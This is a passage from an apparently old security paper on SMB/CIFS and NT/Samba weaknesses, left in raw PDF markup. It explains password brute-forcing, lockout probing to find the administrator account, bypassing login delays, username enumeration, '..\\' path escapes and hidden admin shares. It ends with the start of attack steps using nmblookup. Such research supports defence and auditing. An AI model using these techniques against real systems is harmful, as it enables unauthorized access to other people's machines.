default only logs) Tj 1 0 0 1 54 144.9 Tm (successful filesharing connections. This pretty much lets an attacker guess) Tj 1 0 0 1 54 134.4 Tm (at Unix user passwords all day and never be noticed, similar to what vanilla) Tj 1 0 0 1 54 123.9 Tm (rexec allows. Setting up more meaningful logging gets rather involved and is) Tj 1 0 0 1 54 113.4 Tm (covered later under "defenses." In all cases, recall also that any TCP) Tj 1 0 0 1 54 102.9 Tm (connections can be run through an intermediate relay which will cause the) Tj 1 0 0 1 54 92.4 Tm (relay's IP address to be observed instead of the real source of an attack.) Tj ET Q endstream endobj 68 0 obj 5817 endobj 63 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R66 66 0 R >> >> /Contents [ 64 0 R 67 0 R ] >> endobj 70 0 obj << /Length 71 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 71 0 obj 48 endobj 72 0 obj << /Type /Font /Name /R72 /Subtype /Type1 /BaseFont /Courier >> endobj 73 0 obj << /Length 74 0 R >> stream BT /R72 10 Tf 1 0 0 1 54 711.9 Tm (NT servers exhibit several quirks worth mentioning, most of which reveal that) Tj 1 0 0 1 54 701.4 Tm (the design of the authentication backend is at best naive. A cleartext) Tj 1 0 0 1 54 690.9 Tm (unicode NT password can be sent in smb_vwv8 but if the alignment is screwed up) Tj 1 0 0 1 54 680.4 Tm (or the length given as uneven, the returned error is "parameter incorrect" and) Tj 1 0 0 1 54 669.9 Tm (the event log entry is just "unexpected error." If a properly formed NT) Tj 1 0 0 1 54 659.4 Tm (password is given under NT LM dialect, encrypted or otherwise, any LANMAN) Tj 1 0 0 1 54 648.9 Tm (style one in smb_vwv7 is apparently ignored. Upon valid authentication, other) Tj 1 0 0 1 54 638.4 Tm (error codes returned can mean things like "account disabled", "network access) Tj 1 0 0 1 54 627.9 Tm (denied", "cannot log in from this workstation", as well as several others that) Tj 1 0 0 1 54 617.4 Tm (arguably give out too much information that could help guide an attack. Users) Tj 1 0 0 1 54 606.9 Tm (can be configured such that they can only log in from certain named clients,) Tj 1 0 0 1 54 596.4 Tm (but not only can the client send an arbitrary caller name, it turns out that) Tj 1 0 0 1 54 585.9 Tm (using either a null name or even a single space handily bypasses this silly) Tj 1 0 0 1 54 575.4 Tm (restriction and allows the login anyway.) Tj 1 0 0 1 54 554.4 Tm (NT has the capability to "lock out" accounts after some number of failed login) Tj 1 0 0 1 54 543.9 Tm (attempts. While there is no specific error to indicate this, it is quite easy) Tj 1 0 0 1 54 533.4 Tm (to remotely determine [at least against NT 4.0 with non-permanent user lockout) Tj 1 0 0 1 54 522.9 Tm (policy] when a temporary account lockout happens. Any failed login usually) Tj 1 0 0 1 54 512.4 Tm (causes the server to delay for 2 or 3 seconds before sending the SMB "access) Tj 1 0 0 1 54 501.9 Tm (denied" error, to slow down brute-force attacks. Attempts on a valid username) Tj 1 0 0 1 54 491.4 Tm (will elicit these delayed responses until the lockout threshold is reached,) Tj 1 0 0 1 54 480.9 Tm (and then suddenly there is NO delay anymore and subsequent guesses on the) Tj 1 0 0 1 54 470.4 Tm (same username are denied immediately! If account lockout is enabled, the) Tj 1 0 0 1 54 459.9 Tm (default threshold is between 5 and 10 tries and the lockout time is 30) Tj 1 0 0 1 54 449.4 Tm (minutes. Therefore in most cases it doesn't take very long to make the) Tj 1 0 0 1 54 438.9 Tm (lockout perceptibly happen.) Tj 1 0 0 1 54 417.9 Tm (If attempts on one known-to-exist username triggers login-failure lockout but) Tj 1 0 0 1 54 407.4 Tm (another one does not, chances are that the second one is the administrator) Tj 1 0 0 1 54 396.9 Tm (account. Conversely, if attempts on ADMINISTRATOR trigger lockout, it is) Tj 1 0 0 1 54 386.4 Tm (probably a decoy and the real one has been renamed. Lockout does not apply) Tj 1 0 0 1 54 375.9 Tm (to the administrative account, with the ostensible idea being prevention of) Tj 1 0 0 1 54 365.4 Tm (*total* denial of service attacks. This leaves ADMINISTRATOR or the) Tj 1 0 0 1 54 354.9 Tm (equivalent accountname open to unlimited guessing. Even the access-denied) Tj 1 0 0 1 54 344.4 Tm (delay can be effectively bypassed. The delay is imposed per TCP connection,) Tj 1 0 0 1 54 333.9 Tm (so by opening up 10 connections and pounding in different sets of passwords) Tj 1 0 0 1 54 323.4 Tm (an attacker gets a tenfold increase in brute-force speed. Such an attack) Tj 1 0 0 1 54 312.9 Tm (probably occupies significant server CPU time since not only does the event) Tj 1 0 0 1 54 302.4 Tm (logging go crazy, but each plaintext guess must be re-hashed on the *server*) Tj 1 0 0 1 54 291.9 Tm (side for comparison against the stored OWF. A workaround sometimes suggested) Tj 1 0 0 1 54 281.4 Tm (to combat this is an obscure registry setting that causes the whole server to) Tj 1 0 0 1 54 270.9 Tm (shut down when the event log fills, but that just allows an even worse denial) Tj 1 0 0 1 54 260.4 Tm (of service.) Tj 1 0 0 1 54 239.4 Tm (Phase 4: IPC Tree connect) Tj 1 0 0 1 54 228.9 Tm (=========================) Tj 1 0 0 1 54 207.9 Tm (Now that we are logged in, we can begin exploring what resources the target) Tj 1 0 0 1 54 197.4 Tm (has to offer. A "tree connect" traditionally implies a directory tree in a) Tj 1 0 0 1 54 186.9 Tm (filesystem, but in SMB there is special type of shared resource referred to as) Tj 1 0 0 1 54 176.4 Tm (a named pipe or IPC -- familiar terms to Unix people. Tree connect is) Tj 1 0 0 1 54 165.9 Tm (sometimes also called StartConnection or TCon. A tree connect is performed to) Tj 1 0 0 1 54 155.4 Tm (access any resource, be it a filesystem, a printer, or a named pipe. Pipes) Tj 1 0 0 1 54 144.9 Tm (provide a means for exchanging "API calls" of various types between client and) Tj 1 0 0 1 54 134.4 Tm (server, and besides mentioning a couple of specific API types this document) Tj 1 0 0 1 54 123.9 Tm (does not cover them in any further detail. Besides, according to CIFS the) Tj 1 0 0 1 54 113.4 Tm (newer [and Microsoft-originated, rather than third-party?] RPC facility is) Tj 1 0 0 1 54 102.9 Tm (the recommended interface for such things, implying that the named-pipe API) Tj 1 0 0 1 54 92.4 Tm (may eventually be phased out. Nonetheless the current interface to get) Tj 1 0 0 1 54 81.9 Tm (information about the server is still a named-pipe transaction, so in this) Tj ET Q endstream endobj 74 0 obj 5533 endobj 69 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R72 72 0 R >> >> /Contents [ 70 0 R 73 0 R ] >> endobj 76 0 obj << /Length 77 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 77 0 obj 48 endobj 78 0 obj << /Type /Font /Name /R78 /Subtype /Type1 /BaseFont /Courier >> endobj 79 0 obj << /Length 80 0 R >> stream BT /R78 10 Tf 1 0 0 1 54 711.9 Tm (case we need to do an IPC tree connect to obtain the server's "share list" and) Tj 1 0 0 1 54 701.4 Tm (discover what *other* things we can connect to.) Tj 1 0 0 1 54 680.4 Tm (There is a field in this SMB for a password, which is used if needed for) Tj 1 0 0 1 54 669.9 Tm (accessing filesystems on share-level servers. The IPC tree connect we need) Tj 1 0 0 1 54 659.4 Tm (here should not require a password, but there may be odd cases or other types) Tj 1 0 0 1 54 648.9 Tm (that do. The other fields contain the service type and name which in this) Tj 1 0 0 1 54 638.4 Tm (specific case are the two strings "IPC" and "\\\\SERVER\\IPC$". There is an AndX) Tj 1 0 0 1 54 627.9 Tm (form of this SMB so more requests can be chained onto it -- often used for) Tj 1 0 0 1 54 617.4 Tm (quick one-off requests such as getting share lists. Sometimes the tree) Tj 1 0 0 1 54 606.9 Tm (connect itself is tacked on to the SMB session setup as the AndX request. In) Tj 1 0 0 1 54 596.4 Tm (general if a given phase doesn't appear by itself in a packet dump, check for) Tj 1 0 0 1 54 585.9 Tm (an AndX in the previous request. For example, session setup returning with a) Tj 1 0 0 1 54 575.4 Tm (nonzero TID probably resulted from sending the setup and TCon as one big SMB.) Tj 1 0 0 1 54 554.4 Tm (The Microsoft "net view \\\\servername" command should show the share-list of) Tj 1 0 0 1 54 543.9 Tm (the target, EXCEPT for any "hidden" sharenames that end with "$" per the) Tj 1 0 0 1 54 533.4 Tm (stupid client-side design. [This is described below.] If no existing TCP) Tj 1 0 0 1 54 522.9 Tm (session is established yet, "net view" will behind the scenes go through all) Tj 1 0 0 1 54 512.4 Tm (the SMB steps needed to get to this point. We can usually see any and all) Tj 1 0 0 1 54 501.9 Tm (shares with smbclient, where we specify "-L servername" to list them and some) Tj 1 0 0 1 54 491.4 Tm (other info such as browse lists of neighboring machines. These lists are all) Tj 1 0 0 1 54 480.9 Tm (gotten via API transactions of various sorts with the well-known standard) Tj 1 0 0 1 54 470.4 Tm ("\\PIPE\\LANMAN" service -- possibly because LANMAN 1 was the first dialect to) Tj 1 0 0 1 54 459.9 Tm (support named pipes at all. This a black box in the scope of this document) Tj 1 0 0 1 54 449.4 Tm (but suffice to say it involves wacky strings like "WrLehDO" and "B16BBDz") Tj 1 0 0 1 54 438.9 Tm (plugged into SMB "Trans" requests. Some but not nearly all of this is) Tj 1 0 0 1 54 428.4 Tm (documented in CIFS.) Tj 1 0 0 1 54 407.4 Tm (A successful tree connect response fills in a two-byte SMB header field called) Tj 1 0 0 1 54 396.9 Tm (the tree-ID or TID. This is another arbitrary cookie that the client must) Tj 1 0 0 1 54 386.4 Tm (send back in with any subsequent interactions with the resource in question.) Tj 1 0 0 1 54 375.9 Tm (A client can have more than one active TID at a time. Once the IPC TID is) Tj 1 0 0 1 54 365.4 Tm (established, I/O to the named pipe can begin. After any successful TCon, the) Tj 1 0 0 1 54 354.9 Tm (TCP connection should remain open even if there is no subsequent SMB activity) Tj 1 0 0 1 54 344.4 Tm (for a while. CIFS states that correct server behavior is that it should only) Tj 1 0 0 1 54 333.9 Tm (time out truly inactive client connections, where "inactive" is apparently) Tj 1 0 0 1 54 323.4 Tm (defined as having no current tree connections and not sending any SMB) Tj 1 0 0 1 54 312.9 Tm (requests, but most servers seem to eventually knock down connections with) Tj 1 0 0 1 54 302.4 Tm (or without active TIDs anyway.) Tj 1 0 0 1 54 281.4 Tm (Errors here are many and varied, and again interpret_error helps us figure) Tj 1 0 0 1 54 270.9 Tm (out what is going on. In user-level security "access denied" means that the) Tj 1 0 0 1 54 260.4 Tm (tree connect was attempted without the necessary prior authentication from) Tj 1 0 0 1 54 249.9 Tm (SessionSetupAndX, and in share-level may simply mean the wrong share password) Tj 1 0 0 1 54 239.4 Tm (was given. "Bad password" is more common in the latter case. Another common) Tj 1 0 0 1 54 228.9 Tm (error is "invalid network name" from an attempt to connect to some resource) Tj 1 0 0 1 54 218.4 Tm (that the server doesn't have. Samba issues server-class "access denied" if) Tj 1 0 0 1 54 207.9 Tm (its IP-level allow/deny configuration disallows a service TCon. For the most) Tj 1 0 0 1 54 197.4 Tm (part if any errors other than those just described are returned from an IPC) Tj 1 0 0 1 54 186.9 Tm (TCon, we are probably in a fairly hopeless state and should start over.) Tj 1 0 0 1 54 165.9 Tm (Some old clients cannot do user-level security, so the CIFS spec optionally) Tj 1 0 0 1 54 155.4 Tm (allows for backward compatibility by having the server assume that the calling) Tj 1 0 0 1 54 144.9 Tm (name of a client machine is also the username for session setup purposes.) Tj 1 0 0 1 54 134.4 Tm (If the caller name maps to a known username and that user's correct password) Tj 1 0 0 1 54 123.9 Tm (is supplied as a share password in a TCon, an implicit user login is performed) Tj 1 0 0 1 54 113.4 Tm (and SetupAndX can be skipped. NT and possibly other user-level Microsoft) Tj 1 0 0 1 54 102.9 Tm (servers don't seem to comply with this, handing back "bad UID" errors for) Tj 1 0 0 1 54 92.4 Tm (other SMB requests until a real session setup is completed. Samba supports it) Tj 1 0 0 1 54 81.9 Tm (by building an internal concept of the "potential user" of a given connection) Tj ET Q endstream endobj 80 0 obj 5556 endobj 75 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R78 78 0 R >> >> /Contents [ 76 0 R 79 0 R ] >> endobj 82 0 obj << /Length 83 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 83 0 obj 48 endobj 84 0 obj << /Type /Font /Name /R84 /Subtype /Type1 /BaseFont /Courier >> endobj 85 0 obj << /Length 86 0 R >> stream BT /R84 10 Tf 1 0 0 1 54 711.9 Tm (and checking if various names and SMB parameters from previous phases are) Tj 1 0 0 1 54 701.4 Tm (valid usernames and passwords. This does not necessarily imply protocol) Tj 1 0 0 1 54 690.9 Tm (weakness or that SetupAndX should be skipped if possible -- Samba does most) Tj 1 0 0 1 54 680.4 Tm (of its logging at TCon time, for example. Besides, changing the attempted) Tj 1 0 0 1 54 669.9 Tm (username in this scenario requires a new client connection with a different) Tj 1 0 0 1 54 659.4 Tm (caller name. Generally if a server specifies user-level security then any) Tj 1 0 0 1 54 648.9 Tm (brute-force attack should be performed at the setup phase.) Tj 1 0 0 1 54 627.9 Tm (Some servers deny certain kinds of API calls based on the rights of the user) Tj 1 0 0 1 54 617.4 Tm (login; in particular, giving NT both a null username *and* password allows a) Tj 1 0 0 1 54 606.9 Tm (session setup but is recorded [if at all] as an "anonymous" login rather than) Tj 1 0 0 1 54 596.4 Tm (GUEST, and seems to deny viewing the share list and server info but allow) Tj 1 0 0 1 54 585.9 Tm (viewing the browse list. This is likely intentional, since clients need) Tj 1 0 0 1 54 575.4 Tm (to make such periodic quick connections to master browsers to collect more) Tj 1 0 0 1 54 564.9 Tm ("network neighborhood" info. [See Samba's "nmbsync" utility for an example.]) Tj 1 0 0 1 54 554.4 Tm (To clarify somewhat, a *share* list is equivalent to the exported filesystems) Tj 1 0 0 1 54 543.9 Tm (on the target server, and a *browse* list contains names of neighboring) Tj 1 0 0 1 54 533.4 Tm (computers. This can easily be confused, especially where smbclient's routine) Tj 1 0 0 1 54 522.9 Tm (to list server shares is still called browse_host! Again, a server with a) Tj 1 0 0 1 54 512.4 Tm (browse list often can be address-queried for each of the listed names to find) Tj 1 0 0 1 54 501.9 Tm (more targets. If we can dump the share list, this informs us what filesystem) Tj 1 0 0 1 54 491.4 Tm (shares we might be able to start fooling with in the next phase.) Tj 1 0 0 1 54 470.4 Tm (Phase 5: Fileshare tree connect) Tj 1 0 0 1 54 459.9 Tm (===============================) Tj 1 0 0 1 54 438.9 Tm (This is the same as any other tree connect except that the service type) Tj 1 0 0 1 54 428.4 Tm (becomes "A:" to mean "disk" [go figure...] and we connect to "\\\\SERVER\\FOO") Tj 1 0 0 1 54 417.9 Tm (where FOO is the sharename. Fileshares generally begin at a subdirectory) Tj 1 0 0 1 54 407.4 Tm (somewhere in the local disk, and their names are usually unrelated to the) Tj 1 0 0 1 54 396.9 Tm (subdirectory path. Sharenames are chosen by human administrators, which along) Tj 1 0 0 1 54 386.4 Tm (with the optional comment fields visible in the share list might at least hint) Tj 1 0 0 1 54 375.9 Tm (at what they encompass. A mounted share makes the subdirectory and everything) Tj 1 0 0 1 54 365.4 Tm (from there downward visible to a client across the network.) Tj 1 0 0 1 54 344.4 Tm (This phase is reached via successful completion of the client commands most) Tj 1 0 0 1 54 333.9 Tm (familiar to users. Usernames and passwords from dialogs or command-line) Tj 1 0 0 1 54 323.4 Tm (arguments are supplied where needed. Doing "Net use * \\\\SERVER\\SHARE" makes a) Tj 1 0 0 1 54 312.9 Tm (Microsoft client try contacting SERVER, mount the named SHARE, and assign the) Tj 1 0 0 1 54 302.4 Tm (next free drive letter to it. "Smbclient \\\\\\\\SERVER\\\\SHARE" with optional) Tj 1 0 0 1 54 291.9 Tm (arguments is roughly equivalent, although the mount is only per-process and is) Tj 1 0 0 1 54 281.4 Tm (disconnected when smbclient exits.) Tj 1 0 0 1 54 260.4 Tm (A new TID is returned on success, which thereafter must appear in every SMB) Tj 1 0 0 1 54 249.9 Tm (header that refers to this mount. Almost all servers implement a distinction) Tj 1 0 0 1 54 239.4 Tm (between read-only access to a fileshare and read-write. WFWG and other) Tj 1 0 0 1 54 228.9 Tm (share-level servers often provide for two possible passwords, one of which) Tj 1 0 0 1 54 218.4 Tm (allows writing to the share. User-level servers usually ignore any supplied) Tj 1 0 0 1 54 207.9 Tm (TCon password and presumably assign access rights based on the connecting) Tj 1 0 0 1 54 197.4 Tm (user. NT of course has its slew of user privileges and ACLs on files and) Tj 1 0 0 1 54 186.9 Tm (directories -- the much-ballyhooed holdovers from VMS. Samba primarily relies) Tj 1 0 0 1 54 176.4 Tm (on Unix file permissions, madly swapping its effective unix UID around to) Tj 1 0 0 1 54 165.9 Tm (match that of corresponding SMB user session before trying to access files.) Tj 1 0 0 1 54 155.4 Tm (Samba also imposes several restrictions on "guest" sessions, such as not) Tj 1 0 0 1 54 144.9 Tm (being able to write anything. There doesn't seem to be any clean way of) Tj 1 0 0 1 54 134.4 Tm (determining a remote session's access rights other than trying to perform) Tj 1 0 0 1 54 123.9 Tm (various operations. Retrieving a directory or file obviously indicates) Tj 1 0 0 1 54 113.4 Tm (successful read access, and a simple low-impact way to check for write access) Tj 1 0 0 1 54 102.9 Tm (is to try creating and then deleting a new directory. At first this all) Tj 1 0 0 1 54 92.4 Tm (sounds reasonably secure if the surrounding UID and TID checking is sound,) Tj 1 0 0 1 54 81.9 Tm (but there are still a few problems with the fundamental design.) Tj ET Q endstream endobj 86 0 obj 5482 endobj 81 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R84 84 0 R >> >> /Contents [ 82 0 R 85 0 R ] >> endobj 88 0 obj << /Length 89 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 89 0 obj 48 endobj 90 0 obj << /Type /Font /Name /R90 /Subtype /Type1 /BaseFont /Courier >> endobj 91 0 obj << /Length 92 0 R >> stream BT /R90 10 Tf 1 0 0 1 54 708.9 Tm (Most of the possible errors from this step have already been mentioned.) Tj 1 0 0 1 54 698.4 Tm ("Access denied" or "bad password" mean the obvious in user or share level) Tj 1 0 0 1 54 687.9 Tm (security modes; NT sends the former if a regular user tries to connect to any) Tj 1 0 0 1 54 677.4 Tm (of the special C$ or ADMIN$ type of shares described below. Share-level) Tj 1 0 0 1 54 666.9 Tm (servers usually allow unlimited guesses at share passwords, and deliberate) Tj 1 0 0 1 54 656.4 Tm (delays for incorrect passwords are almost unheard of here. Thus they are not) Tj 1 0 0 1 54 645.9 Tm (only open to the same types of brute-force attacks over the network, such) Tj 1 0 0 1 54 635.4 Tm (attacks can proceed almost at the speed of the intervening wire. If the) Tj 1 0 0 1 54 624.9 Tm (guesses come in too fast some servers can't handle it and just belly-up --) Tj 1 0 0 1 54 614.4 Tm (WFWG is one example -- and it is often necessary to throttle back the guessing) Tj 1 0 0 1 54 603.9 Tm (rate just to get all the way through a dictionary.) Tj 1 0 0 1 54 582.9 Tm (Microsoft clients seem to treat any resource name ending with "$" as "hidden") Tj 1 0 0 1 54 572.4 Tm (and it is even documented that while such fileshare names won't show up) Tj 1 0 0 1 54 561.9 Tm (during browsing, they are available to someone who "knows the name." In) Tj 1 0 0 1 54 551.4 Tm (most cases smbclient will gladly show us all the hidden shares on a server) Tj 1 0 0 1 54 540.9 Tm (regardless, since once again any such concealment is up to the client side.) Tj 1 0 0 1 54 530.4 Tm (Interestingly, "IPC$" also falls into this class. NT almost always sets up a) Tj 1 0 0 1 54 519.9 Tm (predefined set of hidden administrative "default" shares, named "C$" for the) Tj 1 0 0 1 54 509.4 Tm (whole C drive, "D$" for the whole D drive if present, and "ADMIN$" or perhaps) Tj 1 0 0 1 54 498.9 Tm ("WINNT$" pointing into the top of the system directory. While visible via) Tj 1 0 0 1 54 488.4 Tm (smbclient, TCons to them by anything other than an administrator login are) Tj 1 0 0 1 54 477.9 Tm (generally denied but are always worth trying anyway. As mentioned in several) Tj 1 0 0 1 54 467.4 Tm (NT security texts these sharenames are automatically set up at every reboot,) Tj 1 0 0 1 54 456.9 Tm (making it likely that a cracked administrator password gives carte blanche) Tj 1 0 0 1 54 446.4 Tm (access to the entire machine.) Tj 1 0 0 1 54 425.4 Tm (Once a fileshare tree connection has been made, normal network-filesystem) Tj 1 0 0 1 54 414.9 Tm (I/O is possible using more SMBs to read and write files, search directories,) Tj 1 0 0 1 54 404.4 Tm (get and set attributes, do exclusive locks, or whatever. This is why SMBs) Tj 1 0 0 1 54 393.9 Tm (can be large -- for efficiency, since data read or written occupies the) Tj 1 0 0 1 54 383.4 Tm (buffer portion of the blocks. As in NFS, there is no concept of the current) Tj 1 0 0 1 54 372.9 Tm (directory except in the client, which must construct and send a full pathname) Tj 1 0 0 1 54 362.4 Tm (along with the right TID for every file reference. Despite the spec stating) Tj 1 0 0 1 54 351.9 Tm (that having any active tree connect should disable server timeouts, most) Tj 1 0 0 1 54 341.4 Tm (clients periodically send some kind of null SMB to keep things warm -- either) Tj 1 0 0 1 54 330.9 Tm (a SMB echo or, in the case of Samba, a status check of the root directory.) Tj 1 0 0 1 54 320.4 Tm (The opposite of TCon is an SMB called Tree Disconnect or TDis, which tears) Tj 1 0 0 1 54 309.9 Tm (down an existing TCon and invalidates the TID. The transport connection) Tj 1 0 0 1 54 299.4 Tm (remains open for some time afterward, during which other SMBs including a new) Tj 1 0 0 1 54 288.9 Tm (TCon can be issued. Multiple tree connects can be currently active, such as) Tj 1 0 0 1 54 278.4 Tm (an open fileshare or two and a quick IPC to get an updated browse list or) Tj 1 0 0 1 54 267.9 Tm (something.) Tj 1 0 0 1 54 246.9 Tm (The ability to make several arbitrary fileshare tree connects has an) Tj 1 0 0 1 54 236.4 Tm (interesting side effect against Samba servers, which commonly make user home) Tj 1 0 0 1 54 225.9 Tm (directories available as the special [HOMES] share. Where this share points) Tj 1 0 0 1 54 215.4 Tm (to changes dynamically if it matches an existing Unix user, and by default) Tj 1 0 0 1 54 204.9 Tm (the username to authenticate against is taken from the sharename unless) Tj 1 0 0 1 54 194.4 Tm (a different one is specified, say with "smbclient -U". Thus a TCon to) Tj 1 0 0 1 54 183.9 Tm ("\\\\servername\\user" makes just the user's home directory and downward visible.) Tj 1 0 0 1 54 173.4 Tm (However, under many Samba configurations a TCon to the name of some account) Tj 1 0 0 1 54 162.9 Tm (whose home directory is "/" allows the client to view the server's entire) Tj 1 0 0 1 54 152.4 Tm (filesystem. Therefore one can user-level authenticate as "joe" but then TCon) Tj 1 0 0 1 54 141.9 Tm (to "root" or "bin" and explore the whole machine, albeit only as joe's Unix) Tj 1 0 0 1 54 131.4 Tm (UID. This also works against a share-level Samba, since we can either perform) Tj 1 0 0 1 54 120.9 Tm (user-level setup regardless or use the "implied user" client-name feature and) Tj 1 0 0 1 54 110.4 Tm (ask for the different user's sharename. A potentially worse side effect is) Tj 1 0 0 1 54 99.9 Tm (that a TCon to the "sharename" of a user that does not exist returns "network) Tj 1 0 0 1 54 89.4 Tm (name not found", while connecting to one that *does* exist either works or) Tj 1 0 0 1 54 78.9 Tm (returns "access denied" depending on whether the client is in as a real user) Tj ET Q endstream endobj 92 0 obj 5719 endobj 87 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R90 90 0 R >> >> /Contents [ 88 0 R 91 0 R ] >> endobj 94 0 obj << /Length 95 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 95 0 obj 48 endobj 96 0 obj << /Type /Font /Name /R96 /Subtype /Type1 /BaseFont /Courier >> endobj 97 0 obj << /Length 98 0 R >> stream BT /R96 10 Tf 1 0 0 1 54 711.9 Tm (or a guest. Regardless of TCon success or failure, the extant ones also start) Tj 1 0 0 1 54 701.4 Tm (getting added to the visible share list for that client connection! This) Tj 1 0 0 1 54 690.9 Tm (allows a client to scan for valid usernames even if only logged in as a guest,) Tj 1 0 0 1 54 680.4 Tm (albeit at the risk of being extensively logged. A bunch of blind TCon) Tj 1 0 0 1 54 669.9 Tm (attempts can be made and the Samba server conveniently collects the locally) Tj 1 0 0 1 54 659.4 Tm (valid usernames into a viewable list.) Tj 1 0 0 1 54 638.4 Tm (Microsoft servers are not immune to such games either, since most Microsoft) Tj 1 0 0 1 54 627.9 Tm (clients make a single TCP connection and rely on the UID and integrity of the) Tj 1 0 0 1 54 617.4 Tm (network layer to keep user rights separated. Once a UID is valid across a) Tj 1 0 0 1 54 606.9 Tm (given TCP session, it can be used to mount and mess with pretty much any other) Tj 1 0 0 1 54 596.4 Tm (shares the server offers. The couple of known exceptions are the special NT) Tj 1 0 0 1 54 585.9 Tm (admin shares and Samba's guest restrictions. As CIFS support is developed for) Tj 1 0 0 1 54 575.4 Tm (other platforms, the same is likely to be true there too. Some new Unix) Tj 1 0 0 1 54 564.9 Tm (variants already have an SMB network fileystem kernel driver. Unfortunately) Tj 1 0 0 1 54 554.4 Tm (servers are required by the spec to place entirely too much trust in client) Tj 1 0 0 1 54 543.9 Tm (machines. For example, a share mounted by one particular user tends to stick) Tj 1 0 0 1 54 533.4 Tm (around unless specifically disconnected, and thus may be available to another) Tj 1 0 0 1 54 522.9 Tm (user who logs in later even if the new user normally has no account or access) Tj 1 0 0 1 54 512.4 Tm (rights on the *server*. A client could be compromised or network traffic) Tj 1 0 0 1 54 501.9 Tm (spoofed to send requests with an altered UID. It is also not entirely clear) Tj 1 0 0 1 54 491.4 Tm (how "isolated" the TCP connections really are from each other, suggesting that) Tj 1 0 0 1 54 480.9 Tm (messing around with UID/TID combinations might turn up a few surprises. The) Tj 1 0 0 1 54 470.4 Tm (server simply expects every client to behave itself.) Tj 1 0 0 1 54 449.4 Tm (This was really driven home by the discovery of the now well known "dotdot") Tj 1 0 0 1 54 438.9 Tm (bugs. Since most filename parsing and cleanup is left to the client, it was) Tj 1 0 0 1 54 428.4 Tm (found that smbclient could send requests containing filenames of the form) Tj 1 0 0 1 54 417.9 Tm ("..\\..\\CONFIG.SYS" to easily escape the confines of the share. Microsoft's) Tj 1 0 0 1 54 407.4 Tm (official excuse for this was that Samba is an "illegal client" and shouldn't) Tj 1 0 0 1 54 396.9 Tm (be used, but nonetheless released service packs with a couple of pathname) Tj 1 0 0 1 54 386.4 Tm (enforcement bandaids slapped on to the server code. Samba itself didn't fall) Tj 1 0 0 1 54 375.9 Tm (victim to this because its Unix-savvy implementors already knew long since to) Tj 1 0 0 1 54 365.4 Tm (check for ".." and such in pathnames! Part of the patch kit short circuits) Tj 1 0 0 1 54 354.9 Tm (dos_clean_name\(\) to return without touching the given pathname, allowing us) Tj 1 0 0 1 54 344.4 Tm (more freedom to send arbitrary file paths and explore bugs of this sort. This) Tj 1 0 0 1 54 333.9 Tm (is not an automated test; one must play and examine some directories to figure) Tj 1 0 0 1 54 323.4 Tm (out whether a bug is being tickled or not. A fairly reliable way to automate) Tj 1 0 0 1 54 312.9 Tm (such a check is to examine the first entries in directory listings of "\\" and) Tj 1 0 0 1 54 302.4 Tm ("..\\" and compare file attributes; if they are different then something is not) Tj 1 0 0 1 54 291.9 Tm (quite right. There may be some other funky path formats that servers handle) Tj 1 0 0 1 54 281.4 Tm (badly; earlier versions of NT would even crash when asked for various bogus) Tj 1 0 0 1 54 270.9 Tm (pathnames. There are some SMB flags to indicate support for long filenames,) Tj 1 0 0 1 54 260.4 Tm (which may confuse servers if changed in midstream or set under a dialect that) Tj 1 0 0 1 54 249.9 Tm (isn't supposed to support them.) Tj 1 0 0 1 54 228.9 Tm (Launching the attack) Tj 1 0 0 1 54 218.4 Tm (====================) Tj 1 0 0 1 54 197.4 Tm (The preceding explanation has not really detailed the specific real-world) Tj 1 0 0 1 54 186.9 Tm (steps needed to implement an attack. Here we try and pull it all together.) Tj 1 0 0 1 54 176.4 Tm (Parameters that will vary are represented {thus}.) Tj 1 0 0 1 54 155.4 Tm (The attack engine is built from Samba 1.9.15p8, using the instructions and) Tj 1 0 0 1 54 144.9 Tm (patches given in Appendix B. You will also need some password dictionaries,) Tj 1 0 0 1 54 134.4 Tm (which are available from numerous repositories. If you have read this far,) Tj 1 0 0 1 54 123.9 Tm (it seems likely that you can handle this part.) Tj 1 0 0 1 54 102.9 Tm (Scan the target network for NetBIOS-aware hosts to build a list of hostnames) Tj 1 0 0 1 54 92.4 Tm (and IP addresses, perhaps trying a status query to a couple of them to check) Tj 1 0 0 1 54 81.9 Tm (for packet filtering. The rest of this summarizes probing an individual) Tj ET Q endstream endobj 98 0 obj 5338 endobj 93 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R96 96 0 R >> >> /Contents [ 94 0 R 97 0 R ] >> endobj 100 0 obj << /Length 101 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 101 0 obj 48 endobj 102 0 obj << /Type /Font /Name /R102 /Subtype /Type1 /BaseFont /Courier >> endobj 103 0 obj << /Length 104 0 R >> stream BT /R102 10 Tf 1 0 0 1 54 711.9 Tm (target, whose hostname or IP address is hereafter represented by {ip}.) Tj 1 0 0 1 54 701.4 Tm (If a known scope ID is in use, add "-i {scopename}" to all nmblookup and) Tj 1 0 0 1 54 690.9 Tm (smbclient commands.) Tj 1 0 0 1 54 669.9 Tm (Get the target's namelist, using the "*" status query and some type-0 name) Tj 1 0 0 1 54 659.4 Tm (guesses if "*" doesn't work. Directed broadcast to x.y.z.255 may be useful in) Tj 1 0 0 1 54 648.9 Tm (rare cases if one is able to receive all possible responses somehow; note also) Tj 1 0 0 1 54 638.4 Tm (that the broadcast address may not be .255 for many subnets.) Tj 1 0 0 1 54 617.4 Tm ( nmblookup -B {ip} -S \\*) Tj 1 0 0 1 54 606.9 Tm ( nmblookup -B {ip} -S {dns-name}) Tj 1 0 0 1 54 596.4 Tm ( nmblookup -B {ip} -S WORKGROUP#0) Tj 1 0 0 1 54 575.4 